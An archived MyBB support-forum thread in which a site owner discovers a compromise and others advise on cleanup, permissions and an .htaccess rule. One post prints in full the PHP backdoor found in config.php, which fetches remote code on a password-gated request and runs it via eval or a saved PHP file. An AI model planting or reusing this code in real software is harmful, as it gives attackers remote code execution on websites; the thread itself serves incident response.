MyBB Community Forums

MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.6 > 1.6 Security Management and Support > Security Issue
Full Version: Security Issue
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2

User 2877

2011-10-17, 05:03 AM
After install I change the file to 644 but I believe 444 will be fine too.

seminar techi

2011-10-17, 05:53 AM
open the config.php file and check any vulnerability script added inside it...

i belief after few more blank lines there may be vulnerable code passing you information

check out the post
http://community.mybb.com/thread-105780-...#pid772311

- G33K -

2011-10-17, 08:37 AM
You should also check with your host as some hosts automatically lower the chmods of files that are chmoded to 777.

Frank.Barry

2011-10-17, 03:42 PM
This was in the config.php file :

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '5c971edc0b2cc92fc99b5a3609450cb7'){
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

aglioeolio

2011-10-17, 04:06 PM
EDIT: I've just read your last post now... your file was seriously modified http://wiki.mybb.com/index.php/Inc/config.php














---------------------
I think it's a HOST action, too.

I'm hosted at Mediatemple Gridserver and I think that they have enabled a script to CHMOD to 0444 such plain text files with passwords, when uploaded. Default to other files is 0755

Anyway if \inc\config.php is not writable it's a good think to your security, I see that warning in Maintenance under AdminCP and don't give a orange to it Toungue

To increase security you can add in your-forum-url/inc/ this:

File: /inc/.htaccess

<files config.php>
Order allow,deny
Deny from all
</files>

<files .htaccess>
Order allow,deny
Deny from all
</files>

User 2877

2011-10-17, 04:08 PM
That's injection code. You're compromised.

Frank.Barry

2011-10-17, 04:18 PM
What shall I do ?

Paul H.

2011-10-17, 04:27 PM
Delete the code, or just download and re-upload the most recent version of MyBB.

pavemen

2011-10-17, 04:31 PM
(2011-10-17, 04:27 PM)Paul H. Wrote: [ -> ]Delete the code, or just download and re-upload the most recent version of MyBB.

wont include config.php though, so upload all new MyBB code (download it again from the site today) and then upload it all.

clean up existing config.php

delete settings.php and let myBB recreate it.

secure your site, change passwords, run security checks on templates, browse your site's file system for odd files you dont recognize, etc.

User 2877

2011-10-17, 04:44 PM
My guess is that you should have an expert fix and secure this for you. It's likely that it's all backdoored and unless you're thorough to remove every trace of the exploit you'll just be compromised again.

Pages: 1 2
MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.6 > 1.6 Security Management and Support > Security Issue